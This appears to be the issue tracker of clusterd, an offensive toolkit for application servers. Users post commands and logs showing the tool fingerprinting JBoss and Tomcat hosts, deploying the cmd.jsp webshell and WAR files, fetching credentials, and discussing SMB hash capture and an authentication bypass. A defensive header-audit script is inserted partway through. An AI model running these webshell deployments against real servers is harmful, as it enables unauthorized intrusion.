hatriot / clusterd
application server attack toolkit
License: MIT License
I used the payload generator, built a .war file then pointed it to a default tomcat installation. I get a ValueError back ...this is tomcat 5.5
details documented here:
http://pastebin.com/Aedr2zZy
If the remote system never responds or is invoked against Linux, the UNC listener just waits. The timeout should be based upon --timeout (default 5s)
Add a file upload function to cmd.jsp (external request)
The local_address function in utility.py strips off the first two octets of the attack machine's IP. I have provided a fix in the pull requests section.
I am not sure if the ColdFusion LFI stager exploit in clusterd uses CVE-2010-2861 or if that is a separate vulnerability it uses, but if not I recommend a module that exploits CVE-2010-2861, as it is a widespread (many versions) vulnerability in CF and can be used to deploy code. It could also be used as an aux module to get credentials for a CF server, so that's a double win vulnerability right there.
My os is Windows
Python 2.7.5
I tried everything and there is no change, with ./src/lib/resources/cmd.jsp too.
Matched 3 fingerprints for service jboss
[2016-09-15 12:39AM] JBoss EJB Invoker Servlet (version Any)
[2016-09-15 12:39AM] JBoss JMX Invoker Servlet (version Any)
[2016-09-15 12:39AM] JBoss RMI Interface (version Any)
[2016-09-15 12:39AM] Fingerprinting completed.
[2016-09-15 12:39AM] Loading auxiliary for 'jboss'...
[2016-09-15 12:39AM] Loading deployers for platform jboss
[2016-09-15 12:39AM] Deploying WAR with deployer JBoss EJB Invoker Servlet (ejbinvokerservlet)
[2016-09-15 12:39AM] Preparing to deploy # src/lib/resources/cmd.jsp...
[2016-09-15 12:39AM] [Error 2] El sistema no puede encontrar el archivo especificado
[2016-09-15 12:39AM] [Error 2] El sistema no puede encontrar el archivo especificado
[2016-09-15 12:39AM] Finished at 2016-09-15 12:39AM
Hello,
Python 2.x will no longer be supported by their upstream developers in 2020. Thus Debian developers are actively removing Python 2 support in Debian Testing with the goal of getting rid of Python 2 in Debian 11 (bullseye).
Kali is tracking Debian Testing and is thus affected by this. You should consider switching clusterd to Python 3.
FWIW this is tracked in https://gitlab.com/kalilinux/packages/clusterd/issues/1 on the Kali side.
Metasploit has removed msfcli/msfpayload and instead now uses msfvenom. --gen-payload uses msfpayload currently, but this needs to be updated to msfvenom.
Hi.
hatRiot, thanks for your work!
$ pip install -r requirements.txt
Requirement already satisfied: requests>=2.2.1 in c:\python27\lib\site-packages (from -r requirements.txt (line 1))
Requirement already satisfied: idna<2.6,>=2.5 in c:\python27\lib\site-packages (from requests>=2.2.1->-r requirements.txt (line 1))
Requirement already satisfied: urllib3<1.22,>=1.21.1 in c:\python27\lib\site-packages (from requests>=2.2.1->-r requirements.txt (line 1))
Requirement already satisfied: chardet<3.1.0,>=3.0.2 in c:\python27\lib\site-packages (from requests>=2.2.1->-r requirements.txt (line 1))
Requirement already satisfied: certifi>=2017.4.17 in c:\python27\lib\site-packages (from requests>=2.2.1->-r requirements.txt (line 1))
Pedro@Pedro-PC MINGW64 /e/Python27/clusterd (master)
$ python clusterd.py -i x.x.x.x
clusterd/0.5 - clustered attack toolkit
[Supporting 7 platforms]
[2018-03-13 08:55PM] Started at 2018-03-13 08:55PM
Traceback (most recent call last):
File "clusterd.py", line 121, in
prerun(options)
File "clusterd.py", line 45, in prerun
mkdir(state.serve_dir)
WindowsError: [Error 3] Impossibile trovare il percorso specificato: '/tmp/.clusterd'
root@kali:~/clusterd# ./clusterd.py -i -p -a jboss -v 5 --deploy /root/redteam.war
clusterd/0.2 - clustered attack toolkit
Supporting jboss, coldfusion, weblogic, tomcat
[2014-03-06 03:51PM] Started at 2014-03-06 03:51PM
[2014-03-06 03:51PM] Servers' OS hinted at windows
[2014-03-06 03:51PM] Fingerprinting host 'REDACTED'
[2014-03-06 03:51PM] Server hinted at 'jboss'
[2014-03-06 03:51PM] Checking jboss version 5.1 JBoss Web Manager...
[2014-03-06 03:51PM] Checking jboss version 5.1 JBoss JMX Console...
[2014-03-06 03:51PM] Checking jboss version 5.1 JBoss Web Console...
[2014-03-06 03:51PM] Checking jboss version 5.0 JBoss JMX Console...
[2014-03-06 03:51PM] Checking jboss version 5.0 JBoss Web Console...
[2014-03-06 03:51PM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2014-03-06 03:51PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2014-03-06 03:51PM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2014-03-06 03:51PM] Checking jboss version Any JBoss RMI Interface...
[2014-03-06 03:51PM] Checking jboss version Any JBoss Status Page...
[2014-03-06 03:51PM] Matched 2 fingerprints for service jboss
[2014-03-06 03:51PM] JBoss EJB Invoker Servlet (version Any)
[2014-03-06 03:51PM] JBoss JMX Invoker Servlet (version Any)
[2014-03-06 03:51PM] Fingerprinting completed.
[2014-03-06 03:51PM] Preparing to deploy /root/redteam.war...
Traceback (most recent call last):
File "./clusterd.py", line 115, in
run(options)
File "./clusterd.py", line 100, in run
auxengine(fingerengine)
File "/root/clusterd/src/core/auxengine.py", line 50, in auxengine
deployer.run(fingerengine)
File "/root/clusterd/src/core/deployer.py", line 47, in run
deployer.deploy(fingerengine, fingerprint)
File "/root/clusterd/src/platform/jboss/deployers/ejbinvokerservlet.py", line 24, in deploy
fp = [f for f in fingerengine.fingerprints if f.version != 'Any'][0]
IndexError: list index out of range
Whenever I run clusterd.py on Arch Linux I get this:
Traceback (most recent call last):
File "./clusterd.py", line 8, in
from fingerprint import FingerEngine
File "/home/bob/Toolz/clusterd/src/core/fingerprint.py", line 5, in
import utility
File "/home/bob/Toolz/clusterd/src/core/utility.py", line 21
print '\033[32m [%s] %s\033[0m' % (timestamp(), string)
I don't know if this is already possible but I think it would be ideal for clusterd to allow you to specify which IP or interface to listen on for the UNC connect back server. That way if you have multiple Internet facing interfaces you can make sure it communicates with the right one.
Ran into an issue that is 'sometimes' repeatable.
Working on a target of Tomcat 5.5; I'm seeing some inconsistent results. Sometimes I can deploy and invoke a payload just fine. Other times, I get this traceback:
It seems as a workaround, for some reason, I deploy war file on one command. Then invoke it on the next.
Several app servers were found to be vulnerable to Java deserialization vulnerabilities. The article below details exploitation for several app servers:
http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
If authentication is enabled on all exposed interfaces for a JBoss instance, we can still pull headers for the version. This isn't always entirely accurate, and I didn't include it for this very reason, but it's a good last resort indication.
Not sure which versions include the version in the header, but it should suffice for all versions 3.x-5.x, at least.
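A defender-side view of the header-based version hint described above, as an added example that is not clusterd code or part of the original issue: it audits response headers for version banners and flags when the banner disagrees with the asset inventory. The banner formats, sample headers and function names are assumptions constructed for illustration.

```python
import re
from typing import Dict, List, NamedTuple, Optional


class Disclosure(NamedTuple):
    header: str    # header name as received
    product: str   # product token that was matched
    version: str   # version string visible to unauthenticated clients


# Banner formats are assumptions (commonly seen JBoss/Tomcat values),
# not strings taken from clusterd or from the issue text.
BANNER_PATTERNS = [
    ("JBoss", re.compile(r"\bJBoss-(\d+(?:\.\d+)*(?:\.[A-Za-z]\w*)?)")),
    ("JBossWeb", re.compile(r"\bJBossWeb-(\d+(?:\.\d+)*)")),
    ("Apache-Coyote", re.compile(r"\bApache-Coyote/(\d+(?:\.\d+)*)")),
]
AUDITED_HEADERS = ("x-powered-by", "server")

# Constructed sample responses (not captured from a real host).
SAMPLE_42 = {
    "Server": "Apache-Coyote/1.1",
    "X-Powered-By": "Servlet 2.4; JBoss-4.2.3.GA "
                    "(build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0",
}
SAMPLE_51 = {
    "Server": "Apache-Coyote/1.1",
    "X-Powered-By": "Servlet 2.5; JBoss-5.0/JBossWeb-2.1",
}
SAMPLE_CLEAN = {"Content-Type": "text/html"}


def find_disclosures(headers: Dict[str, str]) -> List[Disclosure]:
    """Return every product/version pair leaked by the audited headers."""
    found = []
    for name, value in headers.items():
        if name.lower() not in AUDITED_HEADERS:
            continue
        for product, pattern in BANNER_PATTERNS:
            match = pattern.search(value)
            if match:
                found.append(Disclosure(name, product, match.group(1)))
    return found


def major_minor(version: str) -> str:
    """Reduce '4.2.3.GA' to '4.2' so banner and inventory can be compared."""
    return ".".join(version.split(".")[:2])


def audit(headers: Dict[str, str],
          inventory_version: Optional[str] = None) -> List[str]:
    """Return findings for one response; an empty list means nothing leaked.

    inventory_version is the version the asset inventory records for the
    host. A mismatch shows why a header-derived version is only a hint.
    """
    findings = []
    for d in find_disclosures(headers):
        findings.append("%s exposes %s %s" % (d.header, d.product, d.version))
        if (d.product == "JBoss" and inventory_version
                and major_minor(d.version) != major_minor(inventory_version)):
            findings.append(
                "banner reports %s but inventory lists %s; treat "
                "header-derived versions as a hint only"
                % (major_minor(d.version), major_minor(inventory_version)))
    return findings


if __name__ == "__main__":
    for label, sample, inv in (("4.2 host", SAMPLE_42, "4.2.3.GA"),
                               ("5.1 host", SAMPLE_51, "5.1.0.GA"),
                               ("hardened host", SAMPLE_CLEAN, None)):
        print(label)
        for line in audit(sample, inv) or ["no version banners"]:
            print("  " + line)
```

On JBoss 4.x/5.x the X-Powered-By value is typically added by the ReplyHeaderFilter configured in the web container's web.xml, so removing that filter is the usual way to suppress the banner.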
Identified a couple web managers (v5.1) that had default credentials.
When attempting to deploy, it says "No valid fingerprints to deploy".
I was able to deploy a WAR file manually through the web interface, so it should be possible to add a deployer to include in clusterd.
Is this a known issue, or am I doing something wrong?
I would be glad to help, by running my manual deployment through burp and providing you the HTTP traffic. Let me know.
Command and output below:
~/tools/clusterd# ./clusterd.py -i 127.0.0.1 -p 443 --ssl -a jboss -v5.1 --deploy ./src/lib/resources/cmd.war --usr-auth admin:admin
clusterd/0.4 - clustered attack toolkit
[Supporting 7 platforms]
[2015-04-10 12:13PM] Started at 2015-04-10 12:13PM
[2015-04-10 12:13PM] Servers' OS hinted at windows
[2015-04-10 12:13PM] Fingerprinting host '127.0.0.1'
[2015-04-10 12:13PM] Server hinted at 'jboss'
[2015-04-10 12:13PM] Checking jboss version 5.1 JBoss Web Manager...
[2015-04-10 12:13PM] Checking jboss version 5.1 JBoss JMX Console...
[2015-04-10 12:13PM] Checking jboss version 5.1 JBoss Web Console...
[2015-04-10 12:13PM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2015-04-10 12:13PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2015-04-10 12:13PM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2015-04-10 12:13PM] Checking jboss version Any JBoss RMI Interface...
[2015-04-10 12:13PM] Checking jboss version Any JBoss Status Page...
[2015-04-10 12:13PM] Matched 2 fingerprints for service jboss
[2015-04-10 12:13PM] JBoss Web Manager (version 5.1)
[2015-04-10 12:13PM] JBoss HTTP Headers (Unreliable) (version 5.0)
[2015-04-10 12:13PM] Fingerprinting completed.
[2015-04-10 12:13PM] No valid fingerprints were found to deploy.
[2015-04-10 12:13PM] Finished at 2015-04-10 12:13PM
Add support for Oracle's Fusion middleware. Fingerprints and deployers can likely fall under WebLogic, as it harnesses WebLogic for the backend.
Should be pretty straightforward.
When the argument for an aux module is specified to clusterd, it goes about fingerprinting the target server but does not execute the aux module. Example:
./clusterd.py -i [ip] -p 8080 -a tomcat --tc-ofetch
clusterd/0.3.1 - clustered attack toolkit
[Supporting 7 platforms]
[2014-07-23 02:49PM] Started at 2014-07-23 02:49PM
[2014-07-23 02:49PM] Servers' OS hinted at windows
[2014-07-23 02:49PM] Fingerprinting host '[ip]'
[2014-07-23 02:49PM] Server hinted at 'tomcat'
[2014-07-23 02:49PM] Checking tomcat version 3.3 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 3.3 Tomcat Admin...
[2014-07-23 02:49PM] Checking tomcat version 4.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 4.1 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 4.1 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 4.0 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 5.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 5.5 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 5.5 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 5.0 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 6.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 6.0 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 7.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 7.0 Tomcat Manager...
[2014-07-23 02:49PM] Checking tomcat version 8.0 Tomcat...
[2014-07-23 02:49PM] Checking tomcat version 8.0 Tomcat Manager...
[2014-07-23 02:49PM] Matched 1 fingerprints for service tomcat
[2014-07-23 02:49PM] Tomcat (version 5.0)
[2014-07-23 02:49PM] Fingerprinting completed.
[2014-07-23 02:49PM] Finished at 2014-07-23 02:49PM
Notice that the Tomcat credential fetcher did not execute.
I hard code quite a few strings (stuff like platform names, versions, etc). These should be extrapolated to enums so we can quickly add/remove/change strings/lists at will. sqlmap has an enum for absolutely everything, but if they need to change something, it's all in one place.
An example of this was when Coldfusion 11 support was added. It'd be easy to modify a single string.
msfpayload and msfencode were both removed and msfvenom took their place. Any chance to update the code to support this?
Was unable to work against a version of JMX, not sure why:
root@kali:~/git/clusterd# ./clusterd.py -i x -p 8000 --fingerprint --deploy /usr/share/webshells/jsp/cmdjsp.jsp --deployer ejbinvokerservlet
clusterd/0.3 - clustered attack toolkit
[Supporting 6 platforms]
[2014-05-16 11:51AM] Started at 2014-05-16 11:51AM
[2014-05-16 11:51AM] Servers' OS hinted at windows
[2014-05-16 11:51AM] Fingerprinting host 'x'
[2014-05-16 11:51AM] Checking jboss version 3.2 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 3.2 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 3.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 4.2 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 4.2 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 4.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 4.0 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 5.1 JBoss Web Manager...
[2014-05-16 11:51AM] Checking jboss version 5.1 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 5.1 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 5.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 5.0 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 6.0 JBoss Web Manager...
[2014-05-16 11:51AM] Checking jboss version 6.1 JBoss Web Manager...
[2014-05-16 11:51AM] Checking jboss version 6.1 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 6.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 7.1 JBoss Management...
[2014-05-16 11:51AM] Checking jboss version 7.0 JBoss Management...
[2014-05-16 11:51AM] Checking jboss version 8.0 JBoss Management...
[2014-05-16 11:51AM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2014-05-16 11:51AM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2014-05-16 11:51AM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2014-05-16 11:51AM] Checking jboss version Any JBoss RMI Interface...
[2014-05-16 11:51AM] Checking jboss version Any JBoss Status Page...
[2014-05-16 11:51AM] Matched 4 fingerprints for service jboss
[2014-05-16 11:51AM] JBoss EJB Invoker Servlet (version Any)
[2014-05-16 11:51AM] JBoss HTTP Headers (Unreliable) (version 5.0)
[2014-05-16 11:51AM] JBoss JMX Invoker Servlet (version Any)
[2014-05-16 11:51AM] JBoss Status Page (version Any)
[2014-05-16 11:51AM] Fingerprinting completed.
[2014-05-16 11:51AM] Preparing to deploy /usr/share/webshells/jsp/cmdjsp.jsp...
Invocation Exception
org.jboss.invocation.InvocationException
at org.jboss.invocation.http.servlet.InvokerServlet.processRequest(InvokerServlet.java:188)
at org.jboss.invocation.http.servlet.InvokerServlet.doPost(InvokerServlet.java:224)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:637)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:717)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:235)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:206)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:235)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:191)
at org.jboss.web.tomcat.security.SecurityAssociationValve.invoke(SecurityAssociationValve.java:190)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:433)
at org.jboss.web.tomcat.security.JaccContextValve.invoke(JaccContextValve.java:92)
at org.jboss.web.tomcat.security.SecurityContextEstablishmentValve.process(SecurityContextEstablishmentValve.java:126)
at org.jboss.web.tomcat.security.SecurityContextEstablishmentValve.invoke(SecurityContextEstablishmentValve.java:70)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)
at org.jboss.web.tomcat.service.jca.CachedConnectionValve.invoke(CachedConnectionValve.java:158)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:109)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:330)
at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:829)
at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:598)
at org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:447)
at java.lang.Thread.run(Thread.java:619)
[2014-05-16 11:51AM] Finished at 2014-05-16 11:51AM
root@kali:~/git/clusterd# ./clusterd.py -i x -p 8000 --fingerprint --deploy /usr/share/webshells/jsp/cmdjsp.jsp --deployer jmxinvokerservlet
clusterd/0.3 - clustered attack toolkit
[Supporting 6 platforms]
[2014-05-16 11:51AM] Started at 2014-05-16 11:51AM
[2014-05-16 11:51AM] Servers' OS hinted at windows
[2014-05-16 11:51AM] Fingerprinting host 'x'
[2014-05-16 11:51AM] Checking jboss version 3.2 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 3.2 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 3.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 4.2 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 4.2 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 4.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 4.0 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 5.1 JBoss Web Manager...
[2014-05-16 11:51AM] Checking jboss version 5.1 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 5.1 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 5.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 5.0 JBoss Web Console...
[2014-05-16 11:51AM] Checking jboss version 6.0 JBoss Web Manager...
[2014-05-16 11:51AM] Checking jboss version 6.1 JBoss Web Manager...
[2014-05-16 11:51AM] Checking jboss version 6.1 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 6.0 JBoss JMX Console...
[2014-05-16 11:51AM] Checking jboss version 7.1 JBoss Management...
[2014-05-16 11:51AM] Checking jboss version 7.0 JBoss Management...
[2014-05-16 11:51AM] Checking jboss version 8.0 JBoss Management...
[2014-05-16 11:51AM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2014-05-16 11:51AM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2014-05-16 11:51AM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2014-05-16 11:51AM] Checking jboss version Any JBoss RMI Interface...
[2014-05-16 11:51AM] Checking jboss version Any JBoss Status Page...
[2014-05-16 11:51AM] Matched 4 fingerprints for service jboss
[2014-05-16 11:51AM] JBoss EJB Invoker Servlet (version Any)
[2014-05-16 11:51AM] JBoss HTTP Headers (Unreliable) (version 5.0)
[2014-05-16 11:51AM] JBoss JMX Invoker Servlet (version Any)
[2014-05-16 11:51AM] JBoss Status Page (version Any)
[2014-05-16 11:51AM] Fingerprinting completed.
[2014-05-16 11:51AM] Preparing to deploy /usr/share/webshells/jsp/cmdjsp.jsp...
Exception in thread "main" java.lang.ClassNotFoundException: javax.servlet.ServletException
at java.net.URLClassLoader$1.run(URLClassLoader.java:217)
at java.security.AccessController.doPrivileged(Native Method)
at java.net.URLClassLoader.findClass(URLClassLoader.java:205)
at java.lang.ClassLoader.loadClass(ClassLoader.java:323)
at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:294)
at java.lang.ClassLoader.loadClass(ClassLoader.java:268)
at java.lang.Class.forName0(Native Method)
at java.lang.Class.forName(Class.java:270)
at java.io.ObjectInputStream.resolveClass(ObjectInputStream.java:624)
at org.jboss.invocation.MarshalledValueInputStream.resolveClass(MarshalledValueInputStream.java:109)
at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1611)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1516)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1770)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1349)
at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1989)
at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1914)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1797)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1349)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:369)
at org.jboss.invocation.MarshalledValue.get(MarshalledValue.java:91)
at invkdeploy.main(invkdeploy.java:151)
[2014-05-16 11:51AM] Finished at 2014-05-16 11:51AM
The Metasploit 'check' function identified it as SVNTag=JBoss_5_ but also failed :)
wrong repo - see hatRiot/zarp#26
Doesn't conform to programming standards -- please camel case and resubmit.
I have tried both:
./clusterd.py -i 192.168.56.102 -p 8080 --deployer dfs_deploy --deploy ~/test.war --invoke which gives the following output and deploys the jsp command shell but does not invoke or deploy my war file
[2014-06-27 05:42PM] Started at 2014-06-27 05:42PM
[2014-06-27 05:42PM] Servers' OS hinted at windows
[2014-06-27 05:42PM] Fingerprinting host '192.168.56.102'
[2014-06-27 05:42PM] Checking jboss version 3.2 JBoss JMX Console...
[2014-06-27 05:42PM] Checking jboss version 3.2 JBoss Web Console...
[2014-06-27 05:42PM] Checking jboss version 3.0 JBoss JMX Console...
[2014-06-27 05:42PM] Checking jboss version 4.2 JBoss JMX Console...
[2014-06-27 05:42PM] Checking jboss version 4.2 JBoss Web Console...
[2014-06-27 05:42PM] Checking jboss version 4.0 JBoss JMX Console...
[2014-06-27 05:42PM] Checking jboss version 4.0 JBoss Web Console...
[2014-06-27 05:42PM] Checking jboss version 5.1 JBoss Web Manager...
[2014-06-27 05:42PM] Checking jboss version 5.1 JBoss JMX Console...
[2014-06-27 05:42PM] Checking jboss version 5.1 JBoss Web Console...
[2014-06-27 05:42PM] Checking jboss version 5.0 JBoss JMX Console...
[2014-06-27 05:42PM] Checking jboss version 5.0 JBoss Web Console...
[2014-06-27 05:42PM] Checking jboss version 6.0 JBoss Web Manager...
[2014-06-27 05:42PM] Checking jboss version 6.1 JBoss Web Manager...
[2014-06-27 05:42PM] Checking jboss version 6.1 JBoss JMX Console...
[2014-06-27 05:42PM] Checking jboss version 6.0 JBoss JMX Console...
[2014-06-27 05:42PM] Checking jboss version 7.1 JBoss Management...
[2014-06-27 05:42PM] Checking jboss version 7.0 JBoss Management...
[2014-06-27 05:42PM] Checking jboss version 8.1 JBoss Management...
[2014-06-27 05:42PM] Checking jboss version 8.0 JBoss Management...
[2014-06-27 05:42PM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2014-06-27 05:42PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2014-06-27 05:42PM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2014-06-27 05:42PM] Checking jboss version Any JBoss RMI Interface...
[2014-06-27 05:42PM] Checking jboss version Any JBoss Status Page...
[2014-06-27 05:42PM] Matched 7 fingerprints for service jboss
[2014-06-27 05:42PM] JBoss JMX Console (version 4.2)
[2014-06-27 05:42PM] JBoss Web Console (version 4.2)
[2014-06-27 05:42PM] JBoss EJB Invoker Servlet (version Any)
[2014-06-27 05:42PM] JBoss HTTP Headers (Unreliable) (version 4.2)
[2014-06-27 05:42PM] JBoss JMX Invoker Servlet (version Any)
[2014-06-27 05:42PM] JBoss RMI Interface (version Any)
[2014-06-27 05:42PM] JBoss Status Page (version Any)
[2014-06-27 05:42PM] Fingerprinting completed.
[2014-06-27 05:42PM] This deployer requires a JSP, default to cmd.jsp? [Y/n] > y
[2014-06-27 05:42PM] Preparing to deploy cmd...
[2014-06-27 05:42PM] Successfully deployed '/cmd/cmd.jsp'
[2014-06-27 05:42PM] Finished at 2014-06-27 05:42PM
I also tried using EJB: ./clusterd.py -i 192.168.56.102 -p 8080 --deployer ejbinvokerservlet --deploy ~/test.war --invoke
clusterd/0.3.1 - clustered attack toolkit
[Supporting 6 platforms]
[2014-06-27 05:36PM] Started at 2014-06-27 05:36PM
[2014-06-27 05:36PM] Servers' OS hinted at windows
[2014-06-27 05:36PM] Fingerprinting host '192.168.56.102'
[2014-06-27 05:36PM] Checking jboss version 3.2 JBoss JMX Console...
[2014-06-27 05:36PM] Checking jboss version 3.2 JBoss Web Console...
[2014-06-27 05:36PM] Checking jboss version 3.0 JBoss JMX Console...
[2014-06-27 05:36PM] Checking jboss version 4.2 JBoss JMX Console...
[2014-06-27 05:36PM] Checking jboss version 4.2 JBoss Web Console...
[2014-06-27 05:36PM] Checking jboss version 4.0 JBoss JMX Console...
[2014-06-27 05:36PM] Checking jboss version 4.0 JBoss Web Console...
[2014-06-27 05:36PM] Checking jboss version 5.1 JBoss Web Manager...
[2014-06-27 05:36PM] Checking jboss version 5.1 JBoss JMX Console...
[2014-06-27 05:36PM] Checking jboss version 5.1 JBoss Web Console...
[2014-06-27 05:36PM] Checking jboss version 5.0 JBoss JMX Console...
[2014-06-27 05:36PM] Checking jboss version 5.0 JBoss Web Console...
[2014-06-27 05:36PM] Checking jboss version 6.0 JBoss Web Manager...
[2014-06-27 05:36PM] Checking jboss version 6.1 JBoss Web Manager...
[2014-06-27 05:36PM] Checking jboss version 6.1 JBoss JMX Console...
[2014-06-27 05:36PM] Checking jboss version 6.0 JBoss JMX Console...
[2014-06-27 05:36PM] Checking jboss version 7.1 JBoss Management...
[2014-06-27 05:36PM] Checking jboss version 7.0 JBoss Management...
[2014-06-27 05:36PM] Checking jboss version 8.1 JBoss Management...
[2014-06-27 05:36PM] Checking jboss version 8.0 JBoss Management...
[2014-06-27 05:36PM] Checking jboss version Any JBoss EJB Invoker Servlet...
[2014-06-27 05:36PM] Checking jboss version Any JBoss HTTP Headers (Unreliable)...
[2014-06-27 05:36PM] Checking jboss version Any JBoss JMX Invoker Servlet...
[2014-06-27 05:36PM] Checking jboss version Any JBoss RMI Interface...
[2014-06-27 05:36PM] Checking jboss version Any JBoss Status Page...
[2014-06-27 05:36PM] Matched 7 fingerprints for service jboss
[2014-06-27 05:36PM] JBoss JMX Console (version 4.2)
[2014-06-27 05:36PM] JBoss Web Console (version 4.2)
[2014-06-27 05:36PM] JBoss EJB Invoker Servlet (version Any)
[2014-06-27 05:36PM] JBoss HTTP Headers (Unreliable) (version 4.2)
[2014-06-27 05:36PM] JBoss JMX Invoker Servlet (version Any)
[2014-06-27 05:36PM] JBoss RMI Interface (version Any)
[2014-06-27 05:36PM] JBoss Status Page (version Any)
[2014-06-27 05:36PM] Fingerprinting completed.
[2014-06-27 05:36PM] Preparing to deploy /home/bob/test.war...
[2014-06-27 05:36PM] This deployer requires a JSP, default to cmd.jsp? [Y/n] > y
[2014-06-27 05:36PM] cmd deployed to 192.168.56.102 (/cmd160)
[2014-06-27 05:36PM] Finished at 2014-06-27 05:36PM
Neither works in executing the war file.
It would be wicked to see some Windows love.
After installing requests, I get an initial traceback:
C:\Tools\clusterd>python clusterd.py
←[32m
clusterd/0.3.1 - clustered attack toolkit←[0m
←[33m[Supporting 6 platforms]←[0m
Traceback (most recent call last):
File "clusterd.py", line 108, in <module>
options = parse(sys.argv[1:])
File "C:\Tools\clusterd/src/core/parse_cmd.py", line 92, in parse
group = build_platform_flags(platform, group)
File "C:\Tools\clusterd/src/core/auxengine.py", line 65, in build_platform_flags
mod = auxiliary[0].find_module(auxiliary[1]).load_module(auxiliary[1])
File "C:\Python27\lib\pkgutil.py", line 246, in load_module
mod = imp.load_module(fullname, self.file, self.filename, self.etc)
File "C:\Tools\clusterd\src\platform\jboss\auxiliary\smb_hashes.py", line 8, in <module>
from os import getuid
ImportError: cannot import name getuid
I saw you mention an option called --verb-tamper in order to bypass JBoss 4.x auth,
but in the help itself there is no mention of how to use this option.
Can you please give more details on how to use it?
Hi,
First of all, congrats for the awesome tool.
